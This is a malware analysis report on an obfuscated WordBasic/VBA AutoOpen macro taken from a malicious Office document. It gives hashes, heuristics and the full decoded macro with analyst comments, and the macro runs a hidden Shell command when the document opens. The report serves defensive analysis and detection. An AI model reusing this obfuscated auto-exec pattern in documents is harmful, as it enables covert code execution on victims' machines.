Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c925ac3b2c8d3abd…

MALICIOUS

Office (OLE)

131.3 KB First seen: 2019-05-16
MD5: 6950a0540d8dab678ac1ce66e1119ec3 SHA-1: b039b1f2a0fdd54a613a3249f1e1b8d8231a5abb SHA-256: c925ac3b2c8d3abd7b5d21b559d5d7ec31b435f095cd7c04ab70ec0c3b3da4ef
Risk score: 122

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an OLE document containing a legacy WordBasic AutoOpen macro. The macro is heavily obfuscated and truncated, making it difficult to determine its exact functionality, but the presence of AutoOpen and the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic indicate an attempt to automatically execute malicious code upon opening. The large slack space in the OLE structure is also suspicious.

Heuristics 5

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 134,442 bytes but its declared streams total only 36,399 bytes — 98,043 bytes (73%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro-execution surface; by itself it is not a downloader or parser-CVE attribution.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4029 bytes
SHA-256: d36fea1deb2d51557e4a287c55f373c1fc76085af243242a6830547a9f40c3df
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wstfmJw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: header of the first extracted module. VB_Base names
' Normal.ThisDocument as its base and VB_PredeclaredId is True, so this
' appears to be the document (ThisDocument) module rather than a standard
' module -- TODO confirm against the raw VBA project streams. The
' random-looking module name matches the identifier obfuscation used in the
' procedure bodies that follow. AutoOpen is defined in this module.
Sub AutoOpen()
' Analyst note: auto-execution entry point -- Word runs AutoOpen when the
' document is opened (the surface flagged by OLE_VBA_AUTOOPEN). Nothing in
' this procedure has an observable effect except the toiMFARcmp call below:
' each array assignment stores InStr/InStrRev/Left/Right results computed
' from identifiers that are never declared or assigned anywhere in the
' extracted text, and no array element is ever read back. Treat those
' statements as padding meant to defeat signature matching, not as logic.
   Dim LkaHhw(2)
LkaHhw(0) = InStrRev(wvOdHGRR + sdzBGpZsCDFZbqSccHJzbL + GoqFFTVB, JdkhBGCr + nmMKwpYifXqSrCwwmEZ + moruF) + Left(kSuHUbjG + zTcVSqPJDFtGEKXKzS + knYwmwP, 426) + InStrRev(fHFGjUB + vzqqLctQIwSoihtqEQuhP + KIziDIz, jtwNTt + NtPrcSOwLwOBRafkSmFoV + HwkjW) + InStrRev(vUWvkiq + dwAYUOTiBIPMIqTKQNupl + zEjzk, FcrUcnt + CUCSiMCuOfTSPrORO + ROjGjOY)
LkaHhw(1) = InStrRev(RltsUjO + nhEWOPnjFkZbQlXlbfCdjiO + rnfdqj, avAQT + SdGpUIVwdwFlDzhOCvaHj + kwImUIsX) + Right(bYNQW + zubpzBHiFkjsuiXYHJ + MNtVMaUz, 617) + Right(HoUAnvBl + IoShDiszQZrGDjuaOIE + Oiaik, 561) + InStr(XlEZao + mFiHRQiFjOGLXuRSVEDIU + TUKCc, ibCWFjw + GAOzMAAzJWnrizPwNuVGWT + rhWiUUjz)
   Dim FLWsC(1)
FLWsC(0) = InStrRev(JjHAiklG + inkAXoCiPRjLJYiJPXPtEp + AUhPWt, iNEiXUJ + ZdVzbQCzCNPtjKBOzAun + qDqzlv) + InStrRev(XiMnXZEr + qcUohtDSvZUiXkMzD + zXWBw, cJFoUwsF + zihcTRzVmzoINidwRju + qlTjK) + Left(SiqBY + jFTBcowRNjHOPIklalhz + cihGBqkj, 55) + InStrRev(zfRFKCTG + isJzBnDtwHzLAhQXwYL + mJkfPj, VnzmYIzq + JziATRwUDjEiTarOHoKlQbY + qYRjzt)
   Dim tFOPFu(1)
tFOPFu(0) = InStr(jnRtVXrV + UuFWVcKvRilwfHRiIzvf + XRJsX, nGidXXkm + wVRvrmIiaqmjYOzKAWX + zpAHPkjs) + InStrRev(wKtPj + JHuBBFPcLmcbYiwBl + jtwjZc, wRizN + lwQurYtPzoVliuzpbA + AdLbOV)
' The one live statement. The argument is a string concatenation built from
' two KeyString calls plus more undeclared identifiers. KeyString is not
' defined anywhere in the extracted text (presumably the WordBasic KeyString
' function, key code -> key name -- confirm). No Option Explicit appears in
' the extracted text, so the undeclared names evaluate as Empty: the two
' numeric sums reduce to 0 + 12 + 55 = 67 and 0 + 13 + 64 = 77, and the
' trailing string terms contribute nothing. The resulting command string is
' passed unchanged to Shell inside toiMFARcmp; recovering it (sandbox /
' emulation) is the indicator worth extracting from this sample.
toiMFARcmp (KeyString(pTdKE + zmtFII + 0 + 12 + 55 + nakur + FzTabBS) + qHlZdjk + AUvBlYOO + KeyString(JNMOfLO + drUhdIPA + 0 + 13 + 64 + XDpTGrKj + vMMjkw) + HNktI + ZoHKJwVSDkI + zblWNHa + vtjsdluD + UJjwQNf + HiPaDGvjb + isfjRWMQ + mqTjUOK + JiMjwI)
' More write-only padding after the call; same pattern as above.
   Dim rzMSYv(2)
rzMSYv(0) = Right(EwmDFk + IYBvYvbIKPYaIDJC + QNuEJ, 307) + InStrRev(EMYNGX + hRXDlOjqOuzviNzsK + ODdDDzqK, zCWsiAW + OOvVvvFRAIfPAqDTGQpfKHW + CDNbmKr)
rzMSYv(1) = Left(hiIzjB + HjCjpLaoiZjkOZUdmhsFIPk + aJknUOzm, 476) + Left(smmncS + TInURPYPitQFZqwlOVO + jBszvFcp, 453)
End Sub


Attribute VB_Name = "fISDYwijcME"
' Analyst note: header of the second extracted module (only VB_Name is set,
' so it reads as a plain standard module). It holds toiMFARcmp, the Shell
' wrapper that AutoOpen calls.
Function toiMFARcmp(LKcIQq As String)
' Analyst note: the sample's only real action lives here. LKcIQq is the
' command string assembled in AutoOpen; it is handed unchanged to Shell on
' the line marked below. The function never assigns its own name, so it
' returns the Variant default (Empty); callers ignore the result anyway.
Const dophVu = 0
' dophVu is the window-style argument of Shell. 0 is vbHide, so the launched
' process gets no visible window.
' The array assignments below are write-only padding: operands are
' undeclared identifiers and no element is ever read.
   Dim irPnV(1)
irPnV(0) = InStrRev(LAjcO + ifmZmMVCHXNRzIsunpLunsX + tNrjNShi, ZWjbQHP + IDIXjUpSkzjOPXIozwSaj + XENvmX) + InStrRev(otlqLPXT + JGKHLTCsIiqdYzIlXwcvYb + XDZcfD, TMQsust + GzQNsCShqwhKmjfoBfDnzz + jtrfEjTR) + InStr(KiBGqz + tIakKwNuwDKQGmsqLu + UCUlBnvo, VEVVwit + mWOTwuQuwHBksRqMLRzHw + KskqKwsu) + Left(FiYrls + zYlMEPNsGhnORkAKioKIp + BARVaZYR, 956)
   Dim nQXYTJ(2)
nQXYTJ(0) = InStr(tDHAc + NSViiQAavWIwJuotABAY + FbmEKDv, TKrarcnY + wBDuwPuiBiMunDZoPsbNA + wnURNdE) + InStrRev(ZBjopQO + UGQEWSnZhjUnDFNURnAI + dXHZz, OTfiTsR + otWMQmwaWKuvGTCsvfAk + GTXWt) + Left(SnzHlllr + wcnjSNMBpYGwnJJSaFj + cIGMMj, 324) + Right(zBHvWo + lskRLLzwibYwaSGJHAXU + kwmBsk, 411)
nQXYTJ(1) = Left(ToMDQT + OCpcXZccPizKOubrZv + GMjGdSPq, 815) + InStr(ISktNYD + UqMFFQJpbVTiQnSF + ZomYF, AOSWWoZ + iBMRGAOrzLBdZFDvCajz + IbJzzUi) + InStr(JRtsGY + FFtZXoNYliNZzqwZFs + ciNPoEX, cjbtTB + variEFrPsCIwjaQrJ + UhoHkt) + Right(hoNnJ + wYcWDZLoXHisTaNXFJ + UwqHLNvL, 217)
' DETECTION POINT: Shell runs LKcIQq as a command line with window style 0
' (hidden). The "%" type suffix is an older-BASIC / WordBasic convention and
' does not change what is executed. The return value (task ID) is discarded.
' Process creation from the Office host process with this command line is
' the telemetry to alert on; block or monitor Office-spawned shells.
Shell% LKcIQq, dophVu
' Trailing write-only padding after the Shell call; same pattern as above.
   Dim DkqiFO(2)
DkqiFO(0) = InStr(DaGhw + qslqqEjjwNDfZCbMuwnL + qWVrqEfC, HrczDzEH + LWjSpEGkJCjKAAptshAvi + ZdJuujZi) + InStrRev(mCBlwv + rajcziQNtLKbEfcaSPWHc + ifnHulL, CMzjadfT + UshNGGUWLVSEAlbGwZ + Rmihv)
DkqiFO(1) = InStrRev(kDbFAoAS + YRpJSIpQZsDMVlPbXYZU + SqwHbzS, aIJzz + sfawhqviCkrJwIiztJio + IHGqLo) + Left(zjutjt + rcYObldbBPzIQAXYioRSO + MvEDYo, 456) + Left(FQLzWi + KYRQjXEMVtGaJJuhXHdab + DapZCEJm, 168) + InStrRev(BjYzK + irrwGQzwHWhzpGdDmSpz + TrHtJ, RHzSHHUY + HBPbsvwEVGZtCvmZjEn + QpsnZM)
   Dim nVcRPm(1)
nVcRPm(0) = Left(GnzXGNi + pQwiHNaMfIOZqmjoB + WcCpNCtO, 254) + Right(PIuNPfH + DGEMJTYhdtufutSzLhzSR + LicXEhn, 608) + InStrRev(XpjudM + zhjOBujHCJFnnItEwZMH + dwqlF, DiUFww + nqZkVlcPEmjIzKjKXzsc + pCESUc) + InStrRev(VJjnWi + LajTwFYjfPluOXQ + XRubbTn, zDFsVlR + WdzjipNKjOUPGitjEsfY + mcKtkzdS)
End Function